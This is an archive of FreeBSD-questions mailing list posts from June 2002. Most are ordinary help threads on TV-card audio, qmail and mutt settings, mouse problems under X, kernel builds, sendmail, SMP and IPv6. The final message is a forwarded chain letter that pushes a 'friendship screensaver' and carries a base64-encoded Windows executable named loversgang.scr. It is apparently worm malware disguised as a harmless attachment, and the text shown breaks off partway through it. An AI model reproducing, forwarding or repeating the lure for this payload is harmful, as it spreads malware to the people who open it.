Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, I have a terra tech value card, And it is working fine except the sound of it. So i wounder if anybody can help me fix this problem. Here is sysctl -a | grep bt: hw.bt848.card: -1 hw.bt848.tuner: -1 hw.bt848.reverse_mute: -1 hw.bt848.format: -1 hw.bt848.slow_msp_audio: -1 It might be a simple problem but I have tryed mixing with the mixer, but I coulden't get it make a sound. Here is my dmesg: Copyright (c) 1992-2002 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All rights reserved. FreeBSD 4.6-STABLE #1: Sun Jun 16 18:59:40 CEST 2002 root@:/usr/src/sys/compile/THRAWN Timecounter "i8254" frequency 1193182 Hz Timecounter "TSC" frequency 1410348801 Hz CPU: AMD Athlon(tm) XP 1600+ (1410.35-MHz 686-class CPU) Origin = "AuthenticAMD" Id = 0x662 Stepping = 2 Features=0x383f9ff AMD Features=0xc0480000<,AMIE,DSP,3DNow!> real memory = 536870912 (524288K bytes) avail memory = 518516736 (506364K bytes) Preloaded elf kernel "kernel" at 0xc03ca000. netsmb_dev: loaded Pentium Pro MTRR support enabled md0: Malloc disk Using $PIR table, 6 entries at 0xc00fdf10 npx0: on motherboard npx0: INT 16 interface pcib0: on motherboard pci0: on pI to PCI bridge (vendor=1106 device=b099)> at device 1.0 on pci0 pci1: on pcib1 pci1: at 0.0 irq 10 sym0: <810a> port 0xd000-0xd0ff mem 0xe3003000-0xe30030ff irq 11 at device 9.0 o n pci0 sym0: No NVRAM, ID 7, Fast-10, SE, parity checking bktr0: mem 0xe3000000-0xe3000fff irq 7 at device 10.0 on pci0 iicbb0: on bti2c0 iicbus0: on iicbb0 master-only iicsmb0: on iicbus0 smbus0: on iicsmb0 smb0: on smbus0 iic0: on iicbus0 iicbus1: on iicbb0 master-only iicsmb1: on iicbus1 smbus1: on iicsmb1 smb1: on smbus1 iic1: on iicbus1 smbus2: on bti2c0 smb2: on smbus2 bktr0: Warning - card vendor 0x15f7 (model 0x1118) unknown. bktr0: Pinnacle/Miro TV, Philips NTSC tuner. pci0: (vendor=0x109e, dev=0x0878) at 10.1 irq 7 pcm0: port 0xd400-0xd43f irq 3 at device 11.0 on pci0 vr0: port 0xd800-0xd87f mem 0xe3002000-0xe3002 07f irq 10 at device 12.0 on pci0 vr0: Ethernet address: 00:80:c8:d5:69:60 miibus0: on vr0 amphy0: on miibus0 amphy0: 10baseT, 10baseT-FDX, 100baseTX, 100baseTX-FDX, auto isab0: at device 17.0 on pci0 isa0: on isab0 atapci0: port 0xdc00-0xdc0f at device 17.1 on pci0 ata0: at 0x1f0 irq 14 on atapci0 ata1: at 0x170 irq 15 on atapci0 orm0:
 Hi,
can you send me logo = of FreeBSD -=20 (devil) in high quality or link?
I want print it on my = T-shirt.
 
          &nbs= p;      =20 thanks
          &nbs= p;            = ;         =20 Jozef Manis
------=_NextPart_000_000D_01C21B6D.3361AE20-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 2: 1:40 2002 Delivered-To: freebsd-questions@freebsd.org Received: from free.bsd.net (free.bsd.net [213.221.117.2]) by hub.freebsd.org (Postfix) with SMTP id 1741537B404 for ; Mon, 24 Jun 2002 02:00:16 -0700 (PDT) Received: (qmail 20536 invoked by uid 100); 24 Jun 2002 09:00:11 -0000 X-BSD-Qmail-VirusScan: scanned by Sophos Anti-Virus v3.58 FILE NOT INFECTED: [1024909211.20530-0.free.bsd.net] FILE NOT INFECTED: [1024909211.20530-1.free.bsd.net] Mail-Followup-To: freebsd-questions@freebsd.org, thrawn@linux.nu Date: Mon, 24 Jun 2002 11:00:11 +0200 From: Martin Hasenbein To: =?iso-8859-1?Q?Mattias_Bj=F6rk?= Cc: freebsd-questions@freebsd.org Subject: Re: qmail and domain problems Message-ID: <20020624110011.A19048@free.bsd.net> Reply-To: Martin Hasenbein References: <3d16caf652e5b7.13532844@not right> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="45Z9DzgjV8m4Oswq" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3d16caf652e5b7.13532844@not right>; from thrawn@linux.nu on Mo , Jun 24, 2002 at 09:32:06am +0200 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --45Z9DzgjV8m4Oswq Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mo 24 Jun (09:32:06) Mattias Bj=F6rk (thrawn@linux.nu) wrote: Hoi, > I have an internal domain server serving as a cache and domain server for= the internal network.=20 > And the domain that I use only work on in my LAN. So im woundering if the= re are any ways of config=20 > qmail to no deliver mail from thrawn.birch.se because that is my internal= domain.I does not exist=20 > on the outside of my lan. Put linux.nu (or whatever the existing domains is) into /var/qmail/control/= me This is the name, that qmail uses in SMTP sessions, e.g. HELO ... > Im using mutt as my MUA,and set from=3Dthrawn@linux.nu in my .muttrc to d= eliver from that mail. Because=20 > if I you do not put that line, it tryies to deliver from thrawn@thrawn.bi= rch.se and that do not work=20 > at all. But this do not help if i want to send an email to this list or = freebsd-stable@freebsd.org. > Bacause my MTA is trying to send my mail from thrawn@thrawn.birch.se with= the email of thrawn@linux.nu=20 > and freebsd MTA don't like that. Put the following into your .muttrc: set sendmail=3D"/var/qmail/bin/qmail-inject -fthrawn@linux.nu This will rewrite your Return-Path to thrawn@linux.nu. /mh --=20 Martin Hasenbein -- mh@bsd.net -- http://bsd.net UNIX, a way of life. FreeBSD, my choice of living. --45Z9DzgjV8m4Oswq Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: Weitere Infos: siehe http://www.gnupg.org iD8DBQE9Ft+bqLL0BvqAa6ERAkdWAJ43ZSuR2xYwjQC8TkFSQW/8EYYNoQCgglCQ /mIeushTjtrKkhWTUwdUbPo= =rMbx -----END PGP SIGNATURE----- --45Z9DzgjV8m4Oswq-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 2: 8:16 2002 Delivered-To: freebsd-questions@freebsd.org Received: from seven.slakin.net (adsl-67-112-126-134.dsl.pltn13.pacbell.net [67.112.126.134]) by hub.freebsd.org (Postfix) with ESMTP id 68C6F37B400 for ; Mon, 24 Jun 2002 02:08:13 -0700 (PDT) Received: from localhost (localhost.slakin.net [127.0.0.1]) by seven.slakin.net (Postfix) with ESMTP id A1D07824; Sun, 23 Jun 2002 23:58:10 -0700 (PDT) Date: Sun, 23 Jun 2002 23:58:10 -0700 (PDT) From: Matt Snow To: Ian Barnes Cc: freebsd-questions@freebsd.org Subject: Re: X and my mouse In-Reply-To: Message-ID: <20020623235648.R24434-100000@seven.slakin.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG try maybe not running moused and see if it still act's wierd. If it does their is a conflict with the X server and moused trying to both use the device. This was at least the case for me when using GPM in Linux. * * * * * * * * Matt Snow (@) drama@slakin.net (w) http://slakin.net. On Mon, 24 Jun 2002, Ian Barnes wrote: > Hi, > > I have seen a few posts about mice and X4.2.0 this week, *thinking something > wrong*. > > I have a problem. > My X config is set to sysmouse, when i go into X, (i use kde), i cant click > on anything. It works some of the time, but then i might have to click 7-10 > times before it takes one click. My machine isnt lagged. It just doesnt want > to click. I am running XFree86-4.2.0 with KDE3.0 on my FreeBSD 4.6Stable > box. > > In my rc.conf ... i have moused_enable="YES", it is a ps/2 mouse, that is > loaded via console using moused -t auto -p /dev/psm0, that works fine. My > mouse type is Mecer (something or other). > > Someone please help > Regards > Ian Barnes > > ------------------------ > BOFH - Mom's Pharmacies > Emal: ian@cerebellum.za.net > ------------------------ > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 2:11:20 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id EF1FC37B403 for ; Mon, 24 Jun 2002 02:11:08 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com; Mon, 24 Jun 2002 02:11:08 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: Annelise Anderson Date: Mon, 24 Jun 2002 02:11:07 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Kernelbuild "the new way" (Was: APM not even a sign) Reply-To: pjklist@ekahuna.com Cc: Questions@FreeBSD.ORG References: <20020624013725669.AAA723@empty1.ekahuna.com@pc02.ekahuna.com> In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020624091108201.AAA725@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 23 Jun 2002, at 22:22, Annelise Anderson boldly uttered: > On Sun, 23 Jun 2002, Philip J. Koenig wrote: > > > > So what's the downside of using the "new way" to rebuild a kernel on > > an existing system who hasn't had its source upgraded since the last > > build? > > > > That's been what I've always done - relatively new FreeBSD user that > > I am (since 4.1). Any reason not to do it that way? > > > There is no down side; on a system in which the sources for the base > system have been built and installed (i.e., installworld has been done) > they are equivalent. The kernel will end up (before it's installed) in > the /usr/obj hierarchy, however, just in case you want to build one and > not install it (e.g., building a kernel.GENERIC). > > Annelise OK, thanks for the clarification. I never did learn how to use the "config " command. Somewhere around 4.0 to 4.2 I think is when they introduced the "buildworld/buildkernel" targets. -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 2:11:40 2002 Delivered-To: freebsd-questions@freebsd.org Received: from www.kozubik.com (www.kozubik.com [198.78.70.162]) by hub.freebsd.org (Postfix) with ESMTP id 2190837B401 for ; Mon, 24 Jun 2002 02:11:13 -0700 (PDT) Received: from localhost (john@localhost) by www.kozubik.com (8.11.0/8.11.0) with ESMTP id g5O963k21348; Mon, 24 Jun 2002 02:06:03 -0700 (PDT) (envelope-from john@kozubik.com) Date: Mon, 24 Jun 2002 02:06:03 -0700 (PDT) From: John Kozubik X-Sender: john@www To: Paul Everlund Cc: freebsd-questions@FreeBSD.ORG Subject: Re: Syslog and sendmail In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, Yes, if you want sendmail turned off, you need only add one entry to /etc/rc.conf, and that is: sendmail_enable="NO" Once you have placed that entry into /etc/rc.conf, run the command `ps auxw | grep sendmail` and if it is running, look at the PID and then run `kill -9 (sendmail PID)` Now you know that sendmail is not running, because `ps auxw | grep sendmail` will not show any sendmail processes running. By killing the running sendmail (if there is indeed one running) you remove the need to reboot to have that new value in /etc/rc.conf apply. On future reboots, sendmail will not start. However, you should continue to get your `periodic` emails. ----- John Kozubik - john@kozubik - http://www.kozubik.com On Mon, 24 Jun 2002, Paul Everlund wrote: > Hi! > > In 4.6 quite much, when it comes to sendmail, has changed. Did > read the handbook, but I unfortunately did not find what I was > looking. (Probably looking in the wrong place.) > > As I do not use any mail from my FreeBSD computer, I did put > sendmail_enable="NONE". But it seems that did prevent me from > getting mail from periodic. In 4.5 I had sendmail_enable="NO" > and it did work. > > Should I change it to sendmail_enable="NO" in 4.6 to recieve > these mails? Without changing anything else, can I be sure > no one can use my server as a relay or sending me mail from > the outside? > > Am a bit confused so I hope someone can help me out! > > Thanks in advance. > > Best regards, > Paul > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 2:31:29 2002 Delivered-To: freebsd-questions@freebsd.org Received: from eos.telenet-ops.be (eos.telenet-ops.be [195.130.132.40]) by hub.freebsd.org (Postfix) with ESMTP id B259337B401 for ; Mon, 24 Jun 2002 02:31:19 -0700 (PDT) Received: from localhost (localhost.localdomain [127.0.0.1]) by eos.telenet-ops.be (Postfix) with SMTP id 905391FF2E; Mon, 24 Jun 2002 11:31:18 +0200 (CEST) Received: from fortuna.home.paeps.cx (D5768644.kabel.telenet.be [213.118.134.68]) by eos.telenet-ops.be (Postfix) with ESMTP id 391921FF09; Mon, 24 Jun 2002 11:31:18 +0200 (CEST) Received: from juno.home.paeps.cx (juno [10.0.0.2]) by fortuna.home.paeps.cx (Postfix) with ESMTP id F2CB0995; Mon, 24 Jun 2002 11:31:17 +0200 (CEST) Received: by juno.home.paeps.cx (Postfix, from userid 1001) id CEF50628; Mon, 24 Jun 2002 11:31:17 +0200 (CEST) Date: Mon, 24 Jun 2002 11:31:17 +0200 From: Philip Paeps To: mingo lu Cc: freebsd-questions Subject: Re: SMP problems Message-ID: <20020624093117.GG48808@juno.paeps.cx> Mail-Followup-To: mingo lu , freebsd-questions References: <20020624031644.21901.qmail@web14806.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-15 Content-Disposition: inline In-Reply-To: <20020624031644.21901.qmail@web14806.mail.yahoo.com> X-Message-Flag: Get yourself a real mail client. Try Mutt: User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 2002-06-24 05:17:03, mingo lu wrote: > I am trying to build SMP kernel with my dual-cpu machine (compaq proliant) > and failed. Which Proliant have you got? What all is in the machine? Compaq has about a hundred different Proliants. > atcually it was compiled with no error. After reboot, it hanged > up at : > > ..... > > Change APIC ID for IO APIC #0 from 0 to 2 on chip > > Programming 24 pins in IOAPIC #0 > > IOAPIC #O intpin 2 -> irq 0 > > The booting process never went beyond this,ust hanged at this point. Weird. > I checked kernel file and found there were no lines (options NCPU, NBUS, > NAPIC and NINTR). I added those lines and tried to recomplied it; the > compilation was failed: Can you post your kernel config file? Be sure to remove the 386_CPU and 486_CPU lines when compiling SMP kernels, they 'confuse' things. [...] - Philip -- Philip Paeps philip@paeps.cx http://www.paeps.cx/ +32 486 114 720 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 3:18:22 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.uc3m.es (smtp02.uc3m.es [163.117.136.122]) by hub.freebsd.org (Postfix) with ESMTP id 69A1C37B403 for ; Mon, 24 Jun 2002 03:18:16 -0700 (PDT) Received: from smtp02.uc3m.es (localhost [127.0.0.1]) by smtp.uc3m.es (Postfix) with ESMTP id 61D2A4312D; Mon, 24 Jun 2002 12:18:15 +0200 (CEST) Received: from it.uc3m.es (alacran.it.uc3m.es [163.117.140.44]) by smtp02.uc3m.es (Postfix) with ESMTP id 161BF99EF8; Mon, 24 Jun 2002 12:18:05 +0200 (CEST) Message-ID: <3D16F1D9.D0BE495F@it.uc3m.es> Date: Mon, 24 Jun 2002 12:18:01 +0200 From: Juan Francisco Rodriguez Hervella X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: johann@broadpark.no Cc: questions@FreeBSD.ORG Subject: Re: IPv6 on ADSL -- conflicts with onlamp.com article (IPv6, Meet FreeBSD) References: <1024829192.3d15a70850446@mail.broadpark.no> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG johann@broadpark.no wrote: > Hi. > > I am having some problems setting up IPv6 on my network: > > [1] > I've added this to my g/w kernel: > options IPFIREWALL # Firewall > options IPFIREWALL_VERBOSE # Enable logging to > syslogd(8) > options IPFIREWALL_VERBOSE_LIMIT=100 # Limit verbosity > options IPV6FIREWALL # Firewall for IPv6 > options IPV6FIREWALL_VERBOSE > options IPV6FIREWALL_VERBOSE_LIMIT=100 > > And this to rc.conf: > firewall_enable="YES" > firewall_type="OPEN" > ipv6_firewall_enable="YES" > ipv6_firewall_type="OPEN" > > Yet, I get: > IPv6 packet filtering initialized, logging limited to 100 packets/entry > IP packet filtering initialized, divert enabled, rule-based forwarding > disabled, default to deny, logging limited to 100 packets/entry by default > > Note the `default to deny' -- where does that come from. After I added all > these settings not even my NFS will work. > > [2] > In O'Reilly's IPv6 article > (http://www.onlamp.com/lpt/a//bsd/2002/02/22/ipv6.html) in the `Configuring > Your Gateway Machine' section it describes the rtadvd configuration. On my > g/w I have two interfaces; lnc0 (10.0.0.2, and this address *has* to be > 10.0.0.2 for it to properly connect to my Cisco ADSL modem) and ep0 > (192.168.187.2, connected to my w/s). Excactly what interfaces am I going All your addresses are private ? > to add to /etc/rtadvd.conf? > > [3] > I have registered with Freenet6, and as far as I understand, tspc connects > to it. Both ping6 and traceroute6 doesn't work, but I believe this is > because of the rtadvd. Now, *what* is my IPv6 address? Freenet6 hasn't told > me. dmesg hasn't told me. Who will? > I suggest you to use "6to4" instead of tunnel brokers. I dont remember but I think that there is a "6to4" script for OpenBSD, written in Perl. Try it on. > > [4] > Once I find out what my address is, how will I set up my subnet so it may > work as my IPv4 one does? Will it be an internal subnet or an external > subnet? > > This is all a mess. That article is meant for you guys and not me. Should > it really be like that? > > Thanks. > > -- Johann > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 3:27:39 2002 Delivered-To: freebsd-questions@freebsd.org Received: from linux.nu (port301.cvx3-mal.ppp.netlink.se [62.66.14.48]) by hub.freebsd.org (Postfix) with SMTP id BFA2737B400 for ; Mon, 24 Jun 2002 03:27:35 -0700 (PDT) Received: (qmail 75193 invoked by uid 1022); 24 Jun 2002 10:28:17 -0000 Date: Mon, 24 Jun 2002 12:28:17 +0200 From: thrawn@linux.nu To: freebsd-questions@freebsd.org Subject: Test Please ignore Message-ID: <20020624122817.A75164@thrawn.birch.se> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Im just testing to see if this gets thru please igonre. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 4:13:20 2002 Delivered-To: freebsd-questions@freebsd.org Received: from jester.ti.com (jester.ti.com [192.94.94.1]) by hub.freebsd.org (Postfix) with ESMTP id 0400537B400 for ; Mon, 24 Jun 2002 04:13:10 -0700 (PDT) Received: from dlep8.itg.ti.com ([157.170.134.88]) by jester.ti.com (8.11.6/8.11.6) with ESMTP id g5OBDAr10157; Mon, 24 Jun 2002 06:13:10 -0500 (CDT) Received: from dlep8.itg.ti.com (localhost [127.0.0.1]) by dlep8.itg.ti.com (8.9.3/8.9.3) with ESMTP id GAA03309; Mon, 24 Jun 2002 06:13:09 -0500 (CDT) Received: from popsvr.india.ti.com (popsvr.india.ti.com [157.87.95.215]) by dlep8.itg.ti.com (8.9.3/8.9.3) with ESMTP id GAA03276; Mon, 24 Jun 2002 06:13:06 -0500 (CDT) Received: from gautham ([192.168.185.126]) by popsvr.india.ti.com (8.8.8/8.8.8) with SMTP id QAA22677; Mon, 24 Jun 2002 16:43:01 +0530 (IST) Reply-To: From: "Gautham Ganapathy" To: Cc: "FreeBSD.org - Questions" Subject: RE: TV-Card problem with sound Date: Mon, 24 Jun 2002 16:43:44 +0530 Message-ID: <032101c21b70$34638660$1901a8c0@ti.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <3d16ccd9115fe1.32604773@not right> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Monday, June 24, 2002 1:10 PM, Mattias Björk wrote: > I have a terra tech value card, And it is working fine except > the sound of it. So i wounder if anybody can help me fix this > problem. Here is sysctl -a | grep bt: > in the pixelview (bt878) that i have, the only direct link to my sound card (es1371) was through a small stereo cable at the back. this would connect the tuner to the line-in input in the sound card. so as long as the line-in works, u should get sound. just check if /dev/dsp, tuner(i think) and mixer are proper linked. in my system, they are linked to dsp0, tuner0 and mixer0 > > > hw.bt848.card: -1 > > > hw.bt848.tuner: -1 > > > hw.bt848.reverse_mute: -1 > > > hw.bt848.format: -1 > > > hw.bt848.slow_msp_audio: -1 > my sysctl also seems to be like this, if i remember correctly To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 4:22:55 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.FreeBSD.ORG (213-84-86-16.adsl.xs4all.nl [213.84.86.16]) by hub.freebsd.org (Postfix) with SMTP id 41FED37B404 for ; Mon, 24 Jun 2002 04:22:21 -0700 (PDT) From: gekkenhuis To: freebsd-questions@FreeBSD.ORG Subject: Fw: Learn How To Love :-) Date: Mon,24 Jun 2002 13:21:28 PM X-Mailer: Microsoft Outlook Express 5.50.4133.2400 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=vxtjist Message-Id: <20020624112221.41FED37B404@hub.freebsd.org> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --vxtjist Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
gekkenhuis

----- Original Message -----
From: "friendship" < truefriends@friendsearch.org >
To: < gekkenhuis@hotmail.com >
Sent: Mon,24 Jun 2002 13:21:28 PM
Subject: Learn How To Love :-)


This e-mail is never sent unsolicited. If you need to unsubscribe,
follow the instructions at the bottom of the message.
***********************************************************

Enjoy this friendship Screen Saver and Check ur friends circle...

Send this screensaver from www.friendsearch.org to everyone you
consider a FRIEND, even if it means sending it back to the person
who sent it to you. If it comes back to you, then you'll know you
have a circle of friends.

* To remove yourself from this mailing list, point your browser to:
http://friendsearch.org/remove?freescreensaver
* Enter your email address (gekkenhuis@hotmail.com) in the field provided and click "Unsubscribe".

OR...

* Reply to this message with the word "REMOVE" in the subject line.

This message was sent to address gekkenhuis@hotmail.com
X-PMG-Recipient: gekkenhuis@hotmail.com
<<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>>
--vxtjist Content-Type: application/octet-stream; name=loversgang.scr Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="loversgang.scr" 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 